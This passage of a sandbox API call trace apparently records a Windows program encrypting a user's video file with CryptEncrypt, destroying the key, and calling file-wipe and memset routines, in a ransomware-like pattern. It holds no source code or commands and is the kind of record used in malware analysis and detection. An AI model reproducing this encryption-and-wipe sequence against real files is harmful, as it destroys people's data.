HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0197.220] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0197.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0197.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0197.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0197.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0197.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0197.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0197.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0197.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0197.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0197.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0197.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0197.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0197.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0197.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0197.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0197.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0197.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0197.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0197.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0197.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0197.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0197.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0197.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0197.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0197.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0197.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0197.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0197.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0197.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0197.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0197.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0197.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0197.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0197.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0197.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0197.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0197.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0197.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0197.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0197.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0197.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0197.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0197.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0197.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0197.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0197.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0197.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0197.225] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0197.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0197.225] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c26c8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26c8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0197.225] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.225] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.225] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.225] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.225] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.226] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0197.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0197.226] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.226] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0197.226] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.226] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.226] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.226] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0197.226] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.227] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0197.227] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.227] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.227] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.227] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.227] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.227] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0197.227] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.227] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.228] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xe1da, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xe1e0) returned 1 [0197.228] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.228] CharLowerBuffW (in: lpsz="byte[57825]", cchLength=0xb | out: lpsz="byte[57825]") returned 0xb [0197.230] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.230] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.230] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6d1f0*, pdwDataLen=0x87e820*=0xe1da, dwBufLen=0xe1e0 | out: pbData=0xa6d1f0*, pdwDataLen=0x87e820*=0xe1e0) returned 1 [0197.233] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0197.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.248] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0197.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.248] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.249] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.249] CryptDestroyKey (hKey=0x90af98) returned 1 [0197.249] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0197.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0197.249] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0197.249] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.249] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0197.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.250] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.250] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.250] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.250] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0197.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.250] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.250] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0197.250] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.251] FreeLibrary (hLibModule=0x74f20000) returned 1 [0197.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0197.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0197.253] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0197.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0197.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.253] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7058bcd0, ftCreationTime.dwHighDateTime=0x1d5e3e4, ftLastAccessTime.dwLowDateTime=0xd897bd50, ftLastAccessTime.dwHighDateTime=0x1d5db74, ftLastWriteTime.dwLowDateTime=0xd897bd50, ftLastWriteTime.dwHighDateTime=0x1d5db74, nFileSizeHigh=0x0, nFileSizeLow=0xe1da, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="9e BCelV9odP5IiT.avi", cAlternateFileName="9EBCEL~1.AVI")) returned 0x90af58 [0197.253] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0197.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0197.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0197.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.253] CharLowerBuffW (in: lpsz="byte[57818]", cchLength=0xb | out: lpsz="byte[57818]") returned 0xb [0197.253] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0197.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 